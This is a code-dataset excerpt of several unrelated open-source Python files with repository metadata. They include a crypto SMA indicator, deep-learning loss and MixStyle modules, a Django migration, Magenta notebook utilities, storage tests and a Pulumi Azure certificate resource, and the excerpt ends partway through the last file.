] | 154 | 2018-02-26T12:37:57.000Z | 2020-08-26T13:06:08.000Z | app/analyzers/informants/sma.py | ExBotTrader/Crypto-Signal | 7c6871baa5023e0e4cc14f4cd5ae10ac5592698d | [
"MIT"
] | 535 | 2020-09-04T22:49:14.000Z | 2022-03-27T16:52:07.000Z | """ SMA Indicator
"""
import math
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
class SMA(IndicatorUtils):
def analyze(self, historical_data, period_count=15):
"""Performs a SMA analysis on the historical data
Args:
historical_data (list): A matrix of historical OHCLV data.
period_count (int, optional): Defaults to 15. The number of data points to consider for
our simple moving average.
Returns:
pandas.DataFrame: A dataframe containing the indicators and hot/cold values.
"""
dataframe = self.convert_to_dataframe(historical_data)
sma_values = abstract.SMA(dataframe, period_count).to_frame()
sma_values.dropna(how='all', inplace=True)
sma_values.rename(columns={0: 'sma'}, inplace=True)
return sma_values
| 28.548387 | 99 | 0.674576 |
24cde37eb1ae79fbf681c48181203b5742565388 | 5,709 | py | Python | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 40 | 2022-02-28T02:07:28.000Z | 2022-03-31T09:54:29.000Z | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 5 | 2022-03-15T12:13:33.000Z | 2022-03-31T15:54:08.000Z | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 20 | 2022-02-28T02:07:31.000Z | 2022-03-31T11:40:40.000Z | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlers.models.ppseg.cvlibs import manager
@manager.LOSSES.add_component
class DetailAggregateLoss(nn.Layer):
"""
DetailAggregateLoss's implementation based on PaddlePaddle.
The original article refers to Meituan
Fan, Mingyuan, et al. "Rethinking BiSeNet For Real-time Semantic Segmentation."
(https://arxiv.org/abs/2104.13188)
Args:
ignore_index (int64, optional): Specifies a target value that is ignored
and does not contribute to the input gradient. Default ``255``.
"""
def __init__(self, ignore_index=255):
super(DetailAggregateLoss, self).__init__()
self.ignore_index = ignore_index
self.laplacian_kernel = paddle.to_tensor(
[-1, -1, -1, -1, 8, -1, -1, -1, -1], dtype='float32').reshape(
(1, 1, 3, 3))
self.fuse_kernel = paddle.create_parameter(
[1, 3, 1, 1], dtype='float32')
def forward(self, logits, label):
"""
Args:
logits (Tensor): Logit tensor, the data type is float32, float64. Shape is
(N, C), where C is number of classes, and if shape is more than 2D, this
is (N, C, D1, D2,..., Dk), k >= 1.
label (Tensor): Label tensor, the data type is int64. Shape is (N), where each
value is 0 <= label[i] <= C-1, and if shape is more than 2D, this is
(N, D1, D2,..., Dk), k >= 1.
Returns: loss
"""
boundary_targets = F.conv2d(
paddle.unsqueeze(
label, axis=1).astype('float32'),
self.laplacian_kernel,
padding=1)
boundary_targets = paddle.clip(boundary_targets, min=0)
boundary_targets = boundary_targets > 0.1
boundary_targets = boundary_targets.astype('float32')
boundary_targets_x2 = F.conv2d(
paddle.unsqueeze(
label, axis=1).astype('float32'),
self.laplacian_kernel,
stride=2,
padding=1)
boundary_targets_x2 = paddle.clip(boundary_targets_x2, min=0)
boundary_targets_x4 = F.conv2d(
paddle.unsqueeze(
label, axis=1).astype('float32'),
self.laplacian_kernel,
stride=4,
padding=1)
boundary_targets_x4 = paddle.clip(boundary_targets_x4, min=0)
boundary_targets_x8 = F.conv2d(
paddle.unsqueeze(
label, axis=1).astype('float32'),
self.laplacian_kernel,
stride=8,
padding=1)
boundary_targets_x8 = paddle.clip(boundary_targets_x8, min=0)
boundary_targets_x8_up = F.interpolate(
boundary_targets_x8, boundary_targets.shape[2:], mode='nearest')
boundary_targets_x4_up = F.interpolate(
boundary_targets_x4, boundary_targets.shape[2:], mode='nearest')
boundary_targets_x2_up = F.interpolate(
boundary_targets_x2, boundary_targets.shape[2:], mode='nearest')
boundary_targets_x2_up = boundary_targets_x2_up > 0.1
boundary_targets_x2_up = boundary_targets_x2_up.astype('float32')
boundary_targets_x4_up = boundary_targets_x4_up > 0.1
boundary_targets_x4_up = boundary_targets_x4_up.astype('float32')
boundary_targets_x8_up = boundary_targets_x8_up > 0.1
boundary_targets_x8_up = boundary_targets_x8_up.astype('float32')
boudary_targets_pyramids = paddle.stack(
(boundary_targets, boundary_targets_x2_up, boundary_targets_x4_up),
axis=1)
boudary_targets_pyramids = paddle.squeeze(
boudary_targets_pyramids, axis=2)
boudary_targets_pyramid = F.conv2d(boudary_targets_pyramids,
self.fuse_kernel)
boudary_targets_pyramid = boudary_targets_pyramid > 0.1
boudary_targets_pyramid = boudary_targets_pyramid.astype('float32')
if logits.shape[-1] != boundary_targets.shape[-1]:
logits = F.interpolate(
logits,
boundary_targets.shape[2:],
mode='bilinear',
align_corners=True)
bce_loss = F.binary_cross_entropy_with_logits(logits,
boudary_targets_pyramid)
dice_loss = self.fixed_dice_loss_func(
F.sigmoid(logits), boudary_targets_pyramid)
detail_loss = bce_loss + dice_loss
label.stop_gradient = True
return detail_loss
def fixed_dice_loss_func(self, input, target):
"""
simplified diceloss for DetailAggregateLoss.
"""
smooth = 1.
n = input.shape[0]
iflat = paddle.reshape(input, [n, -1])
tflat = paddle.reshape(target, [n, -1])
intersection = paddle.sum((iflat * tflat), axis=1)
loss = 1 - (
(2. * intersection + smooth) /
(paddle.sum(iflat, axis=1) + paddle.sum(tflat, axis=1) + smooth))
return paddle.mean(loss)
| 39.10274 | 90 | 0.622876 |
f23a20395d9ed00d6ccb79d44268967facb21461 | 2,512 | py | Python | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 1 | 2021-09-30T05:25:08.000Z | 2021-09-30T05:25:08.000Z | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 8 | 2021-09-30T05:27:09.000Z | 2021-12-03T23:02:24.000Z | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 3 | 2021-09-29T05:11:45.000Z | 2021-10-31T07:26:31.000Z | # Generated by Django 3.1.6 on 2021-02-09 00:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='MyStock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=8)),
],
),
migrations.CreateModel(
name='MyStockHistorical',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('on', models.DateField(verbose_name='Date')),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close', models.FloatField()),
('vol', models.FloatField(verbose_name='Volume (000)')),
('stock', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stocks', to='stock.mystock')),
],
options={
'unique_together': {('stock', 'on')},
'index_together': {('stock', 'on')},
},
),
migrations.CreateModel(
name='MyStrategyValue',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.IntegerField(choices=[(1, 'daily return'), (2, 'overnight return')], default=1)),
('val', models.FloatField(blank=True, default=-1, null=True)),
('hist', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stock.mystockhistorical')),
],
),
migrations.CreateModel(
name='MySector',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=32, null=True)),
('code', models.CharField(max_length=8, verbose_name='Sector code')),
('description', models.TextField(blank=True, null=True)),
('stocks', models.ManyToManyField(to='stock.MyStock')),
],
),
]
| 41.866667 | 133 | 0.552946 |
e8b34896d5acdd076d4c1539ce60945d5dc8c319 | 1,009 | py | Python | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:13:45.000Z | 2018-09-01T20:00:55.000Z | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 1 | 2018-09-12T18:30:17.000Z | 2018-09-12T18:30:17.000Z | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:08:36.000Z | 2018-09-23T06:11:04.000Z | import unittest
from programytest.storage.asserts.store.assert_genders import GenderStoreAsserts
from programy.storage.stores.sql.store.lookups import SQLGenderStore
from programy.storage.stores.sql.engine import SQLStorageEngine
from programy.storage.stores.sql.config import SQLStorageConfiguration
import programytest.storage.engines as Engines
class SQLGenderStoreTests(GenderStoreAsserts):
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_initialise(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLGenderStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_upload_from_file(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLGenderStore(engine)
self.assert_upload_from_text_file(store)
| 33.633333 | 80 | 0.765114 |
1faf75489c955330b8ef37634bf5dea45a13a46c | 66 | py | Python | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | lst = ["hello", "world"]
print lst[0]
str = "hello"
print str[0] | 11 | 24 | 0.590909 |
b73a56069b2aac029ad8c40efe2c16e9561bb469 | 2,623 | py | Python | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test NIDM extractor"""
from shutil import copy
from os.path import dirname
from os.path import join as opj
from datalad.api import Dataset
from datalad.tests.utils import with_tempfile
from datalad.tests.utils import ok_clean_git
from datalad.tests.utils import assert_status
from datalad.tests.utils import assert_result_count
from . import datalad_extracts_annex_key
@with_tempfile(mkdir=True)
def test_nidm(path):
ds = Dataset(path).create()
ds.config.add('datalad.metadata.nativetype', 'nidm', where='dataset')
# imagine filling the dataset up with something that NIDM info could be
copy(
opj(dirname(dirname(dirname(__file__))), 'tests', 'data', 'files', 'nifti1.nii.gz'),
path)
# extracted from
ds.add('.')
# all nice and tidy, nothing untracked
ok_clean_git(ds.path)
# engage the extractor(s)
res = ds.aggregate_metadata()
# aggregation done without whining
assert_status('ok', res)
res = ds.metadata(reporton='datasets')
# ATM we do not forsee file-based metadata to come back from NIDM
assert_result_count(res, 1)
# kill version info
core = res[0]['metadata']['datalad_core']
core.pop('version', None)
core.pop('refcommit')
# show full structure of the assembled metadata from demo content
target_metadata = {
"@context": {"@vocab": "http://docs.datalad.org/schema_v2.0.json"},
"datalad_core": {"@id": ds.id}, "nidm": {
"@context": {"mydurationkey": {"@id": "time:Duration"},
"myvocabprefix": {
"@id": "http://purl.org/ontology/mydefinition",
"description": "I am a vocabulary",
"type":
"http://purl.org/dc/dcam/VocabularyEncodingScheme"}},
"mydurationkey": 0.6}}
if datalad_extracts_annex_key:
target_metadata['datalad_unique_content_properties'] = \
{
"annex": {
"key": [
"MD5E-s15920--acfb708aa74951cfff1a9d466f6d77be.nii.gz"
]
}
}
assert_result_count(res, 1, metadata=target_metadata)
| 39.149254 | 107 | 0.582158 |
f803dce75084e5f681a61886b132f24ad8716764 | 7,827 | py | Python | magenta/music/notebook_utils.py | cristianmtr/magenta | ac2d8ae455fdd07f4b46dec82aedab22fcb6bbbd | [
"Apache-2.0"
] | 1 | 2019-01-24T07:22:48.000Z | 2019-01-24T07:22:48.000Z | magenta/music/notebook_utils.py | dkun7944/magenta | 8f930263b7cfd67f27eb12cd871b4e5fa87d382e | [
"Apache-2.0"
] | null | null | null | magenta/music/notebook_utils.py | dkun7944/magenta | 8f930263b7cfd67f27eb12cd871b4e5fa87d382e | [
"Apache-2.0"
] | 1 | 2019-11-26T06:30:52.000Z | 2019-11-26T06:30:52.000Z | # Copyright 2018 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python functions which run only within a Jupyter or Colab notebook."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import collections
import io
import os
import bokeh
import bokeh.plotting
from IPython import display
from magenta.music import midi_synth
import numpy as np
import pandas as pd
from scipy.io import wavfile
from six.moves import urllib
import tensorflow as tf
_DEFAULT_SAMPLE_RATE = 44100
_play_id = 0 # Used for ephemeral colab_play.
def colab_play(array_of_floats, sample_rate, ephemeral=True, autoplay=False):
"""Creates an HTML5 audio widget to play a sound in Colab.
This function should only be called from a Colab notebook.
Args:
array_of_floats: A 1D or 2D array-like container of float sound
samples. Values outside of the range [-1, 1] will be clipped.
sample_rate: Sample rate in samples per second.
ephemeral: If set to True, the widget will be ephemeral, and disappear
on reload (and it won't be counted against realtime document size).
autoplay: If True, automatically start playing the sound when the
widget is rendered.
"""
from google.colab.output import _js_builder as js # pylint:disable=g-import-not-at-top,protected-accessk,import-error
normalizer = float(np.iinfo(np.int16).max)
array_of_ints = np.array(
np.asarray(array_of_floats) * normalizer, dtype=np.int16)
memfile = io.BytesIO()
wavfile.write(memfile, sample_rate, array_of_ints)
html = """<audio controls {autoplay}>
<source controls src="data:audio/wav;base64,{base64_wavfile}"
type="audio/wav" />
Your browser does not support the audio element.
</audio>"""
html = html.format(
autoplay='autoplay' if autoplay else '',
base64_wavfile=base64.b64encode(memfile.getvalue()))
memfile.close()
global _play_id
_play_id += 1
if ephemeral:
element = 'id_%s' % _play_id
display.display(display.HTML('<div id="%s"> </div>' % element))
js.Js('document', mode=js.EVAL).getElementById(element).innerHTML = html
else:
display.display(display.HTML(html))
def play_sequence(sequence,
synth=midi_synth.synthesize,
sample_rate=_DEFAULT_SAMPLE_RATE,
colab_ephemeral=True,
**synth_args):
"""Creates an interactive player for a synthesized note sequence.
This function should only be called from a Jupyter or Colab notebook.
Args:
sequence: A music_pb2.NoteSequence to synthesize and play.
synth: A synthesis function that takes a sequence and sample rate as input.
sample_rate: The sample rate at which to synthesize.
colab_ephemeral: If set to True, the widget will be ephemeral in Colab, and
disappear on reload (and it won't be counted against realtime document
size).
**synth_args: Additional keyword arguments to pass to the synth function.
"""
array_of_floats = synth(sequence, sample_rate=sample_rate, **synth_args)
try:
import google.colab # pylint: disable=unused-import,unused-variable,g-import-not-at-top
colab_play(array_of_floats, sample_rate, colab_ephemeral)
except ImportError:
display.display(display.Audio(array_of_floats, rate=sample_rate))
def plot_sequence(sequence,
show_figure=True):
"""Creates an interactive pianoroll for a tensorflow.magenta.NoteSequence.
Example usage: plot a random melody.
sequence = mm.Melody(np.random.randint(36, 72, 30)).to_sequence()
bokeh_pianoroll(sequence)
Args:
sequence: A tensorflow.magenta.NoteSequence.
show_figure: A boolean indicating whether or not to show the figure.
Returns:
If show_figure is False, a Bokeh figure; otherwise None.
"""
def _sequence_to_pandas_dataframe(sequence):
"""Generates a pandas dataframe from a sequence."""
pd_dict = collections.defaultdict(list)
for note in sequence.notes:
pd_dict['start_time'].append(note.start_time)
pd_dict['end_time'].append(note.end_time)
pd_dict['duration'].append(note.end_time - note.start_time)
pd_dict['pitch'].append(note.pitch)
pd_dict['bottom'].append(note.pitch - 0.4)
pd_dict['top'].append(note.pitch + 0.4)
pd_dict['velocity'].append(note.velocity)
pd_dict['fill_alpha'].append(note.velocity / 128.0)
pd_dict['instrument'].append(note.instrument)
pd_dict['program'].append(note.program)
# If no velocity differences are found, set alpha to 1.0.
if np.max(pd_dict['velocity']) == np.min(pd_dict['velocity']):
pd_dict['fill_alpha'] = [1.0] * len(pd_dict['fill_alpha'])
return pd.DataFrame(pd_dict)
# These are hard-coded reasonable values, but the user can override them
# by updating the figure if need be.
fig = bokeh.plotting.figure(
tools='hover,pan,box_zoom,reset,previewsave')
fig.plot_width = 500
fig.plot_height = 200
fig.xaxis.axis_label = 'time (sec)'
fig.yaxis.axis_label = 'pitch (MIDI)'
fig.yaxis.ticker = bokeh.models.SingleIntervalTicker(interval=12)
fig.ygrid.ticker = bokeh.models.SingleIntervalTicker(interval=12)
# Pick indexes that are maximally different in Spectral8 colormap.
spectral_color_indexes = [7, 0, 6, 1, 5, 2, 3]
# Create a Pandas dataframe and group it by instrument.
dataframe = _sequence_to_pandas_dataframe(sequence)
instruments = sorted(set(dataframe['instrument']))
grouped_dataframe = dataframe.groupby('instrument')
for counter, instrument in enumerate(instruments):
instrument_df = grouped_dataframe.get_group(instrument)
color_idx = spectral_color_indexes[counter % len(spectral_color_indexes)]
color = bokeh.palettes.Spectral8[color_idx]
source = bokeh.plotting.ColumnDataSource(instrument_df)
fig.quad(top='top', bottom='bottom', left='start_time', right='end_time',
line_color='black', fill_color=color,
fill_alpha='fill_alpha', source=source)
fig.select(dict(type=bokeh.models.HoverTool)).tooltips = (
{'pitch': '@pitch',
'program': '@program',
'velo': '@velocity',
'duration': '@duration',
'start_time': '@start_time',
'end_time': '@end_time',
'velocity': '@velocity',
'fill_alpha': '@fill_alpha'})
if show_figure:
bokeh.plotting.output_notebook()
bokeh.plotting.show(fig)
return None
return fig
def download_bundle(bundle_name, target_dir, force_reload=False):
"""Downloads a Magenta bundle to target directory.
Target directory target_dir will be created if it does not already exist.
Args:
bundle_name: A string Magenta bundle name to download.
target_dir: A string local directory in which to write the bundle.
force_reload: A boolean that when True, reloads the bundle even if present.
"""
tf.gfile.MakeDirs(target_dir)
bundle_target = os.path.join(target_dir, bundle_name)
if not os.path.exists(bundle_target) or force_reload:
response = urllib.request.urlopen(
'http://download.magenta.tensorflow.org/models/%s' % bundle_name)
data = response.read()
local_file = open(bundle_target, 'wb')
local_file.write(data)
local_file.close()
| 38.180488 | 120 | 0.716622 |
7eb151bf06a181ed4bc6f54f562bffc49f35deaf | 3,127 | py | Python | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 160 | 2021-01-13T07:17:27.000Z | 2022-03-30T14:43:54.000Z | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 15 | 2021-03-23T22:30:20.000Z | 2022-03-29T03:04:33.000Z | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 22 | 2021-01-18T06:37:45.000Z | 2022-03-16T07:37:15.000Z | import random
from contextlib import contextmanager
import torch
import torch.nn as nn
def deactivate_mixstyle(m):
if type(m) == MixStyle:
m.set_activation_status(False)
def activate_mixstyle(m):
if type(m) == MixStyle:
m.set_activation_status(True)
def random_mixstyle(m):
if type(m) == MixStyle:
m.update_mix_method('random')
def crossdomain_mixstyle(m):
if type(m) == MixStyle:
m.update_mix_method('crossdomain')
@contextmanager
def run_without_mixstyle(model):
# Assume MixStyle was initially activated
try:
model.apply(deactivate_mixstyle)
yield
finally:
model.apply(activate_mixstyle)
@contextmanager
def run_with_mixstyle(model, mix=None):
# Assume MixStyle was initially deactivated
if mix == 'random':
model.apply(random_mixstyle)
elif mix == 'crossdomain':
model.apply(crossdomain_mixstyle)
try:
model.apply(activate_mixstyle)
yield
finally:
model.apply(deactivate_mixstyle)
class MixStyle(nn.Module):
"""MixStyle.
Reference:
Zhou et al. Domain Generalization with MixStyle. ICLR 2021.
"""
def __init__(self, p=0.5, alpha=0.1, eps=1e-6, mix='random'):
"""
Args:
p (float): probability of using MixStyle.
alpha (float): parameter of the Beta distribution.
eps (float): scaling parameter to avoid numerical issues.
mix (str): how to mix.
"""
super().__init__()
self.p = p
self.beta = torch.distributions.Beta(alpha, alpha)
self.eps = eps
self.alpha = alpha
self.mix = mix
self._activated = True
def __repr__(self):
return f'MixStyle(p={self.p}, alpha={self.alpha}, eps={self.eps}, mix={self.mix})'
def set_activation_status(self, status=True):
self._activated = status
def update_mix_method(self, mix='random'):
self.mix = mix
def forward(self, x):
if not self.training or not self._activated:
return x
if random.random() > self.p:
return x
B = x.size(0)
mu = x.mean(dim=[2, 3], keepdim=True)
var = x.var(dim=[2, 3], keepdim=True)
sig = (var + self.eps).sqrt()
mu, sig = mu.detach(), sig.detach()
x_normed = (x-mu) / sig
lmda = self.beta.sample((B, 1, 1, 1))
lmda = lmda.to(x.device)
if self.mix == 'random':
# random shuffle
perm = torch.randperm(B)
elif self.mix == 'crossdomain':
# split into two halves and swap the order
perm = torch.arange(B - 1, -1, -1) # inverse index
perm_b, perm_a = perm.chunk(2)
perm_b = perm_b[torch.randperm(B // 2)]
perm_a = perm_a[torch.randperm(B // 2)]
perm = torch.cat([perm_b, perm_a], 0)
else:
raise NotImplementedError
mu2, sig2 = mu[perm], sig[perm]
mu_mix = mu*lmda + mu2 * (1-lmda)
sig_mix = sig*lmda + sig2 * (1-lmda)
return x_normed*sig_mix + mu_mix
| 25.422764 | 90 | 0.587464 |
18171409a64f54c584a3509a99a7c76a99460e6b | 515 | py | Python | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/28 12:30
# @Author : Meta_Chen
# @File : getip.py
# @Software: PyCharm
# @Target: 获取公网ip
import requests
import re
class GetIP:
'''
获取本机IP
'''
response = requests.get("http://txt.go.sohu.com/ip/soip")
def getip(self):
text = self.response.text
myip = re.findall(r'\d+.\d+.\d+.\d+',text)
return myip[0]
def main():
getip = GetIP()
print(getip.getip())
if __name__ == '__main__':
main() | 18.392857 | 61 | 0.565049 |
4550d3721ac11b953db2f52cf6705bb340e57160 | 17,716 | py | Python | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CertificateArgs', 'Certificate']
@pulumi.input_type
class CertificateArgs:
def __init__(__self__, *,
automation_account_name: pulumi.Input[str],
base64: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Certificate resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "automation_account_name", automation_account_name)
pulumi.set(__self__, "base64", base64)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Input[str]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def base64(self) -> pulumi.Input[str]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@base64.setter
def base64(self, value: pulumi.Input[str]):
pulumi.set(self, "base64", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _CertificateState:
def __init__(__self__, *,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exportable: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Certificate resources.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] thumbprint: The thumbprint for the certificate.
"""
if automation_account_name is not None:
pulumi.set(__self__, "automation_account_name", automation_account_name)
if base64 is not None:
pulumi.set(__self__, "base64", base64)
if description is not None:
pulumi.set(__self__, "description", description)
if exportable is not None:
pulumi.set(__self__, "exportable", exportable)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def base64(self) -> Optional[pulumi.Input[str]]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@base64.setter
def base64(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "base64", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def exportable(self) -> Optional[pulumi.Input[bool]]:
